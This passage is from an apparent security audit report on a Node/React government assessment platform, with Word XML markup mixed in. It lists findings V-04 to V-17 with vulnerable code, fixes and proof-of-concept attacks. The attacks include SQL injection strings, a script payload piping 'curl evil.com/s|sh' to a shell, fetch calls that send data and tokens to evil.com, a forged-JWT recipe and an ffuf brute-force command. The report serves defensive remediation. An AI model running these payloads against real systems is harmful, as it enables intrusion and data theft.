4. Login as admin@system.gov / password123 =&gt; full super_admin access.</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Remove the credential block immediately. Rotate all three accounts. Use environment-seeded scripts for development credentials — never frontend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REMOVE this entire block from Login.jsx:</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&lt;div&gt;admin@system.gov / password123 ...&lt;/div&gt;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For dev seeding, use a separate script (never committed with real passwords):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scripts/seed-dev.js (add to .gitignore)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devUsers =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email: process.env.SEED_ADMIN_EMAIL,</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password: process.env.SEED_ADMIN_PASS, role: 'super_admin'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V-04  |  SQL Injection via Unsanitized ORDER BY and INTERVAL Parameters</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8.1 (AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)</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SQL Injection</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server/utils/auditLog.js — Line 75 (getAuditLog) and Lines 142-149 (cleanupOldAuditLogs)</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getAuditLog() directly interpolates caller-supplied 'orderBy' and 'orderDirection' into a SQL string without validation. cleanupOldAuditLogs() interpolates a 'daysOld' value directly into an INTERVAL literal. If either value derives from user input, an attacker can inject arbitrary SQL to read, modify, or destroy data.</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server/utils/auditLog.js  Line 75 — ORDER BY injection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sql += ` ORDER BY ${orderBy} ${orderDirection}`;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no validation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Lines 142-149 — INTERVAL injection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await pool.query(`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DELETE FROM AuditLog</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WHERE performed_at &lt; NOW() - INTERVAL '${daysOld} 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 unvalidated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GET /api/admin/audit?sort=performed_at;DROP+TABLE+users--
=&gt; Arbitrary SQL execution via ORDER BY injection.
cleanupOldAuditLogs('1 UNION SELECT password_hash,2,3 FROM users--')
=&gt; Full credential table exfiltration.</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Use strict column allowlists for ORDER BY. Cast daysOld to integer. Never interpolate user input into SQL strings.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server/utils/auditLog.js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COLS = ['performed_at','table_name','record_id','operation_type'];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DIRS = ['ASC','DESC'];</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col = COLS.includes(orderBy) ? orderBy : 'performed_at';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dir = DIRS.includes(orderDirection?.toUpperCase()) ? orderDirection.toUpperCase() : 'DESC';</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sql += ` ORDER BY ${col} ${dir}`;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For cleanupOldAuditLogs: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async function cleanupOldAuditLogs(daysOld = 365)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safe = Math.max(1, Math.floor(Number(daysOld)));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(!Number.isFinite(safe)) throw new Error('Invalid daysOld');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await pool.query(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`DELETE FROM AuditLog WHERE performed_at &lt; NOW() - ($1 * INTERVAL '1 day')`,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[safe]  // parameterized — safe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V-05  |  HTML Injection in Puppeteer PDF Generator (Leads to RCE with V-06)</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8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) — Critical when chained with V-06</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XSS / Stored HTML Injection via PDF Renderer</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server/utils/pdfGeneratorNew.js — Lines 345-560 | statisticsPdfGenerator.js | entitiesPdfGenerator.js</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All three PDF generators interpolate user-controlled assessment data (entity names, third_party_name, service_details, network_types, etc.) directly into HTML template strings without any escaping before Puppeteer renders them. An attacker can inject arbitrary HTML and JavaScript that executes inside the headless Chromium renderer.</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pdfGeneratorNew.js Line 345 — entity name injected raw</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&lt;span class='info-value'&gt;${entity.name_ar || entity.name}&lt;/span&gt;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Line 452 — user-supplied third party name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`طرف ثالث (${step2.third_party_name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Line 462 — array values mapped directly to HTML spans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${(step2.network_types||[]).map(t=&gt;`&lt;span&gt;${t.toUpperCase()}&lt;/span&gt;`).join('')}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Line 516 — freetext field, no escaping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&lt;td&gt;${step3.service_details}&lt;/td&gt;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Set entity.name_ar = '&lt;script&gt;require("child_process").exec("curl evil.com/s|sh")&lt;/script&gt;'
Trigger any PDF export =&gt; Puppeteer executes payload in Chromium context.
Combined with V-06 (--no-sandbox) =&gt; arbitrary OS command execution on server.</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Apply an escapeHtml() function to every interpolated user value in all three PDF generator files.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Add to top of all three PDF generator files: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function escapeHtml(s)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(s == null) return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return String(s)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.replace(/&amp;/g,'&amp;amp;').replace(/&lt;/g,'&amp;lt;')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.replace(/&gt;/g,'&amp;gt;').replace(/"/g,'&amp;quot;')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.replace(/'/g,'&amp;#39;');</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Apply to EVERY interpolation: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BEFORE: `&lt;span&gt;${entity.name_ar}&lt;/span&gt;`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AFTER:  `&lt;span&gt;${escapeHtml(entity.name_ar)}&lt;/span&gt;`</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V-06  |  Puppeteer Running Without OS Sandbox (--no-sandbox)</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7.5 — Combined with V-05 escalates to 9.8 CRITICAL</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Security Misconfiguration</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server/utils/pdfGeneratorNew.js:7 | statisticsPdfGenerator.js:13-14 | entitiesPdfGenerator.js:8-9</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All three Puppeteer instances disable the OS-level Chromium sandbox with --no-sandbox and --disable-setuid-sandbox. This removes the primary containment layer that prevents renderer process escapes. Any JavaScript injected via V-05 runs without sandboxing and can directly read/write the host filesystem, make network connections, and execute OS commands.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All three PDF utilities — identical anti-pattern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const browser = await puppeteer.launch({</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headless: 'new',</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args: ['--no-sandbox', '--disable-setuid-sandbox']  // OS sandbox removed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statisticsPdfGenerator.js also adds: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args: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'--no-sandbox',</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'--disable-setuid-sandbox',</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'--disable-dev-shm-usage',  // acceptable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'--disable-gpu',            // acceptable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Chain with V-05:
  entity.name = '&lt;script&gt;require("fs").readFileSync("/etc/passwd","utf8")&lt;/script&gt;'
  =&gt; PDF export triggers script =&gt; reads server files
  =&gt; No sandbox =&gt; file contents sent to attacker
  =&gt; Escalates to full server compromise.</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Remove --no-sandbox. Run the PDF service as a dedicated non-root user. Containerize Puppeteer separately from the main API server.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Run as non-root (Dockerfile): RUN adduser --disabled-password pdfuser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USER pdfuser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browser = await puppeteer.launch({</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headless: 'new',</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Remove --no-sandbox entirely when running as non-root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args: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'--disable-dev-shm-usage',  // OK for containers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'--disable-gpu',</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NO --no-sandbox</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V-07  |  Broken CORS — All Origins Permitted with credentials:true</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7.5 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N)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Security Misconfiguration / CORS</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server/index.js — Lines 28-38</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CORS callback has a logic bug: for non-allowed origins it calls cb(null, allowedOrigins[0]) — passing a truthy string as the second argument. The cors library interprets any truthy value as 'permitted', so all origins are effectively allowed, including attacker-controlled ones. Combined with credentials:true, this enables any site to make authenticated cross-origin requests on behalf of victims.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server/index.js  Lines 33-38</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origin: (origin, cb)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if (!origin) return cb(null,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if (allowedOrigins.includes(origin)) return cb(null,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if (/^https?:\/\/(localhost|127\.0\.0\.1):\d+$/.test(origin)) return cb(null,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cb(null, allowedOrigins[0]);  // BUG: truthy string = ALLOWED, not rejected!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credentials: true   // makes this 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Attacker at http://evil.com runs:
  fetch('http://target.gov/api/assessments',{credentials:'include'})
    .then(r=&gt;r.json()).then(d=&gt;fetch('https://evil.com/?d='+JSON.stringify(d)))
Victim's browser sends their authenticated session =&gt; attacker receives all data.</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Fix the fallback to pass an error, not a truthy value. Remove the wildcard localhost regex in production environments.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server/index.js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app.use(cors({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origin: (origin, cb) =&gt;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(!origin) return cb(null, true);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(allowedOrigins.includes(origin)) return cb(null, true);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FIXED: reject with error — not a truthy allowed value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return cb(new Error('CORS: origin not permitted'), false);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credentials: true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V-08  |  JWT Embeds Permissions — Stale Privileges + Weak Secret</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7.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)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Session Management / Broken Access Control</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server/middleware/auth.js — Lines 82-90 | .env — JWT_SECRET</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auth middleware trusts the JWT's embedded permissions array directly without re-querying the database. Revoking a user's role has no effect for up to 7 days. The JWT secret is the well-known development default string, making token forgery trivial for anyone who has read the source code.</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server/middleware/auth.js  Lines 82-90</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if (decoded.permissions &amp;&amp; decoded.permissions.length &gt; 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user.permissions  = decoded.permissions;  // trusted from token — never re-checked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user.scope        = decoded.scope || 'own';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user.institutions = decoded.institutions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.env — weak, predictable default secret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JWT_SECRET=development_jwt_secret_key_change_in_production_min_32_chars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JWT_EXPIRES_IN=7d  // 7-day window for privilege abuse after revocation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1. Register as entity_user, obtain JWT.
2. Decode payload: change role='super_admin', permissions=ALL_PERMISSIONS.
3. Re-sign with known secret 'development_jwt_secret_key_change_in_production_min_32_chars'
4. Use forged token =&gt; server accepts =&gt; full admin access.</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Always load permissions from DB on each request. Store only userId in JWT. Rotate secret to a cryptographically random value. Shorten token lifetime.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server/middleware/auth.js — always re-query DB</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decoded = jwt.verify(token, process.env.JWT_SECRET);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decoded only contains { userId, exp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 permissions, scope } = await loadUserPermissions(user.id, user.role);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user.permissions = permissions;  // fresh from DB every request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Generate secure secret (run once):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node -e "console.log(require('crypto').randomBytes(64).toString('base64'))"</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JWT_EXPIRES_IN=15m  (use refresh tokens for longer sessions)</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V-09  |  JWT &amp; User Object Stored in localStorage — XSS Token Theft</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7.4 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N)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Session Management</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src/services/index.js — Lines 7-8 | src/services/api.js — Line 14 | src/pages/TemplateAssessmentList.jsx — Line 13</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JWT tokens and the full user object (including role and permissions) are stored in localStorage, which is accessible to any JavaScript on the page. Any XSS vulnerability — current or future — can exfiltrate the token in a single line. Additionally, components read role data directly from localStorage, enabling client-side privilege escalation via browser DevTools.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src/services/index.js  Lines 7-8</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localStorage.setItem('token', response.data.token);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localStorage.setItem('user', JSON.stringify(response.data.user));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both accessible to any JS on page including injected scripts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src/pages/TemplateAssessmentList.jsx  Line 13</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const user = JSON.parse(localStorage.getItem('user'));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UI access decisions based on tampered client-side storage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XSS payload: &lt;img src=x onerror="fetch('https://evil.com/?t='+localStorage.token)"&gt;
=&gt; Attacker receives victim's JWT =&gt; impersonates them for 7 days.
Or: Open DevTools =&gt; Application =&gt; localStorage =&gt; set user.role='super_admin' =&gt; frontend shows admin UI.</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Store JWT in httpOnly, Secure, SameSite=Strict cookies. Fetch role/permissions from /api/auth/me — never from localStorage.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server/routes/auth.js — set httpOnly cookie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res.cookie('access_token', token,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httpOnly: true,    // JS cannot read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true,      // HTTPS only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sameSite: 'Strict',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maxAge: 15 * 60 * 1000</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src/services/api.js — remove token interceptor, use withCredentials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api = axios.create({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baseURL: API_URL,</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withCredentials: true,  // cookie sent automatically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Remove all localStorage.setItem/getItem for token and user</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V-10  |  No Rate Limiting on Authentication Endpoints</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7.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)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Authentication — Brute Force</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server/routes/auth.js | server/index.js | package.json (express-rate-limit not installed)</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There is no rate limiting, IP throttling, account lockout, or CAPTCHA on any authentication endpoint. Given the hardcoded credentials and weak password policy, an automated brute-force attack can succeed in seconds.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server/index.js — no rate limiting middleware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package.json — 'express-rate-limit' not in dependencies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server/routes/auth.js — bare handler, unlimited requests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router.post('/login',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No: rate limit, IP block, lockout counter, CAPTCHA, artificial delay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const isValid = await bcrypt.compare(password, user.password_hash);</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ffuf -u http://target/api/auth/login -X POST -H 'Content-Type: application/json' \
  -d '{"email":"admin@system.gov","password":"FUZZ"}' \
  -w /usr/share/wordlists/rockyou.txt -t 100
=&gt; 100 parallel requests/sec, account cracked in under 1 minute.</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Apply express-rate-limit to all auth endpoints. Implement account lockout and progressive delays after repeated failures.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npm install express-rate-limit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import rateLimit from 'express-rate-limit';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authLimiter = rateLimit({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windowMs: 15 * 60 * 1000,  // 15 minutes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max: 5,                     // 5 attempts per window per IP</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message: { error: 'Too many attempts. Try again in 15 minutes.'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standardHeaders: true,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skipSuccessfulRequests: true,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app.use('/api/auth/login', authLimiter);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app.use('/api/auth/register', authLimiter);</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1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">V-11  |  Broken Access Control — Assessment Review Accepts Any Non-Entity Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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7.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N)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Broken Access Control</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server/routes/assessments.js — POST /:id/review (Lines 230-260)</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review endpoint uses a negative check (block entity_user), meaning any other role — QuestionManager, Evaluator, Viewer, or any custom RBAC role — can approve or reject any assessment. The endpoint also lacks a check that the reviewer's entity hierarchy includes the target assessment.</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server/routes/assessments.js  Lines 235-245</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router.post('/:id/review', authenticateToken,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Weak negative check — only blocks entity_user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if (req.user.role === 'entity_user')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return res.status(403).json({ error: 'Only admins can review'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Viewer, QuestionManager, Evaluator — all can approve!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No check that reviewer owns the assessment's ministry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await query('UPDATE assessments SET status=$1 WHERE id=$2', [newStatus, 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1. Login as 'Viewer' role (read-only permissions intended).
2. POST /api/assessments/99/review {"action":"approve"}
=&gt; Assessment 99 (any organization) approved without authorization.</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Use a positive allowlist of roles with approval rights. Add ministry tree ownership check.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router.post('/:id/review',</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authenticateToken,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authorizeRoles('super_admin', 'ministry_admin'),  // positive allowlist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async (req, res) =&gt;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(req.user.role === 'ministry_admin')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ok = await checkEntityInMinistryTree(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req.user.entity_id, assessment.entity_id);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(!ok) return res.status(403).json({ error: 'Access denied'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proceed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1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">V-12  |  IDOR — Entity Detail Endpoints Have No Authorization Checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)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Insecure Direct Object Reference</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server/routes/entities.js — GET /:id, GET /:id/dashboard, GET /:id/children</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GET /entities/:id, /dashboard, and /children endpoints fetch by numeric ID with no entity ownership validation. Any authenticated user can retrieve full details — contact information, addresses, and assessment statistics — for any entity in the system.</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server/routes/entities.js  Lines 100-118</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router.get('/:id', authenticateToken, async (req, res)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const result = await query(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'SELECT e.*, pe.name FROM entities e LEFT JOIN entities pe ON... WHERE e.id=$1',</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[id]  // no role or ownership check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res.json({ entity: result.rows[0]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Same pattern in /:id/dashboard and /:id/children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Login as entity_user for Entity 5.
  GET /api/entities/1          =&gt; Full details for a different ministry entity
  GET /api/entities/1/dashboard =&gt; That entity's assessment statistics
Iterate 1..N =&gt; complete organizational enumeration.</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Apply the same access-control logic used in GET / (list) to all individual entity endpoints.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apply after fetch in each entity endpoint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if (req.user.role === 'entity_user')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allowed = req.user.institutions?.length &gt; 0</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req.user.institutions : [req.user.entity_id];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(!allowed.includes(entity.id))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return res.status(403).json({ error: 'Access denied'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else if (req.user.role === 'ministry_admin')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ok = await checkEntityInMinistryTree(req.user.entity_id, entity.id);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(!ok) return res.status(403).json({ error: 'Access denied'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1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">V-13  |  No Password Policy — Passwords as Short as 1 Character Accepted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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5.9 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)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Authentication — Weak Credentials</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server/routes/auth.js — Lines 16-20 | server/routes/users.js — Line 29</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public registration endpoint accepts any non-empty string as a password. The admin user-creation endpoint enforces only a 6-character minimum — well below industry minimums. Neither enforces complexity. Combined with no rate limiting (V-10), weak passwords are trivially brute-forced.</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server/routes/auth.js  Lines 16-20 — only checks non-empty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if (!email || !password || !full_name)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return res.status(400).json({ error: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password 'a' (1 character) is fully accepted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server/routes/users.js  Line 29 — only 6 chars minimum</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if (String(password).length &lt; 6) { return res.status(400)...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POST /api/auth/register {"email":"x@y.com","password":"a","full_name":"X","role":"super_admin"}
=&gt; Account created with 1-char password and super_admin role.</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Enforce minimum 12 characters with complexity requirements on all endpoints that accept passwords.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server/utils/validatePassword.js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export function validatePassword(pw)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(!pw || pw.length &lt; 12) return 'Minimum 12 characters required';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(!/[A-Z]/.test(pw)) return 'Must contain uppercase letter';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(!/[a-z]/.test(pw)) return 'Must contain lowercase letter';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(!/[0-9]/.test(pw)) return 'Must contain a digit';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if (!/[^A-Za-z0-9]/.test(pw)) return 'Must contain special character';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return null; // valid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In auth.js and users.js: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err = validatePassword(password);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if (err) return res.status(400).json({ error: err });</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1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">V-14  |  No Security Headers — Missing CSP, HSTS, and Helmet.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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5.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)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Security Misconfiguration</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server/index.js — No security headers configured | package.json — helmet not installed</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application configures no HTTP security headers: no Content-Security-Policy (CSP), no X-Frame-Options, no X-Content-Type-Options, no HSTS, no Referrer-Policy. Express exposes X-Powered-By by default. Without CSP, any XSS vulnerability has no browser-level mitigation.</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server/index.js — bare Express, zero security headers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app.use(express.json({ limit: '10mb'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app.use(express.urlencoded({ extended: true, limit: '10mb'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Missing: helmet(), CSP, HSTS, X-Frame-Options, Referrer-Policy...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package.json — 'helmet' not present in any dependency list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curl -I http://target/api/auth/login
  X-Powered-By: Express  (reveals framework version)
  No Content-Security-Policy
  No X-Frame-Options  (clickjacking possible)
  No Strict-Transport-Security</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Install Helmet.js and configure a strict Content Security Policy. Disable X-Powered-By.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npm install helmet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import helmet from 'helmet';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app.use(helmet({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contentSecurityPolicy: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directives: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defaultSrc: ["'self'"],</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scriptSrc: ["'self'"],</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styleSrc: ["'self'", "'unsafe-inline'", 'fonts.googleapis.com'],</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fontSrc: ["'self'", 'fonts.gstatic.com'],</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imgSrc: ["'self'", 'data:'],</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connectSrc: ["'self'"],</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frameSrc: ["'none'"],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hsts: { maxAge: 31536000, includeSubDomains: true, preload: true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1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">V-15  |  Source Maps Enabled in Production Build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)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Sensitive Data Exposure</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vite.config.js — Line 18 (sourcemap: true)</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production Vite build has sourcemap: true, exposing the complete original React source code to anyone with browser DevTools. This reveals all API endpoint paths, business logic, component structure, and role-check implementation details — significantly accelerating attacker reconnaissance.</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vite.config.js  Lines 15-20</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build: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outDir: 'dist',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sourcemap: true,  // entire source code exposed in production bundle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1. Open browser DevTools =&gt; Sources tab.
2. Navigate to webpack:// or source map URL.
3. All original .jsx files readable in full:
   - API endpoint paths, role checks, business rules
   - Complete frontend access control bypass roadmap.</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Disable source maps for production builds. Use a server-side error tracking service for debugging.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vite.config.js — SECURE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build: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outDir: 'dist',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sourcemap: process.env.NODE_ENV !== 'production',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 For error tracking: use Sentry, upload maps privately, delete from bundle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6B35" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">V-16  |  Full SQL Query Text Logged to Console in All Environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="1A6B3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LOW</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4.9 (AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)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Logging &amp; Monitoring</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server/database/db.js — Line 35 | server/middleware/auth.js — Line 95</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Every SQL query including its full text is logged to stdout via console.log. The auth middleware also logs user email and all permissions on every request. In production, these logs create a detailed audit trail accessible to anyone with log access, revealing schema structure, filter values, and user activities.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server/database/db.js  Line 35</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console.log('Executed query', { text, duration, rows: res.rowCount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text = full SQL including any sensitive filter values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server/middleware/auth.js  Line 95</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console.log('Authenticated user:', user.email, 'role:', user.role,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'permissions:', user.permissions.length);</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logged on EVERY authenticated request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Access server logs =&gt; reconstruct full DB schema from query patterns.
Identify active admin accounts and their last activity timestamps.
Correlate query timing to specific user actions for targeted attacks.</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Use a structured logger (Pino/Winston) with environment-aware levels. Suppress query text and user emails in production logs.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npm install pino</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import pino from 'pino';</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const log = pino({ level: process.env.LOG_LEVEL || 'info'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db.js — production-safe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if (process.env.NODE_ENV !== 'production')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log.debug({ sql: text, duration, rows: res.rowCount }, 'query');</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else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log.debug({ duration, rows: res.rowCount }, 'query'); // no SQL text</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6B35" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">V-17  |  Stack Traces Exposed in HTTP Error Responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="1A6B3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LOW</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1B2A4A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS Score: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">4.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B2A4A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Category: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Sensitive Data Exposure</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B2A4A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Location: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">server/index.js — Lines 93-99 (global error handler)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B2A4A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Technical Description</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">The global error handler sends full JavaScript stack traces in HTTP responses when NODE_ENV is 'development'. Since .env sets NODE_ENV=development as the default, this is active in any deployed environment that hasn't explicitly overridden it. Stack traces expose file paths, function names, and framework versions.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B2A4A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerable Code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server/index.js  Lines 93-99</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app.use((err, req, res, next)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res.status(err.status || 500).json({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error: err.message,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 NODE_ENV defaults to 'development' =&gt; always true in many deployments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...(process.env.NODE_ENV === 'development' &amp;&amp; { stack: err.stack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A5F3FC"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>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C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Proof-of-Concept Attack</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -X POST /api/auth/login -H 'Content-Type: text/plain' -d 'bad'
=&gt; { "error": "Unexpected token", "stack": "SyntaxError...\n    at /app/server/index.js:46" }
Reveals: internal paths, framework version, line numbers for targeted exploitation.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="166534"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Recommended Fix</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Never expose stack traces to clients. Use correlation IDs. Ensure NODE_ENV=production in deployment configs.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SECURE: server/index.js error handler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app.use((err, req, res, next) =&gt;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const errorId = crypto.randomUUID();</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logger.error({ errorId, err }, 'Unhandled error');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res.status(err.status || 500).json({</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error: 'Internal server error',</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errorId,  // client can report this for support — no sensitive details</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="052E16" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="30"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="30"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="86EFAC"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">// .env.production: NODE_ENV=production</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">4.  PRIORITIZED REMEDIATION PLAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Phase 1 — Immediate (Block Production Deployment)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="256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right"/>
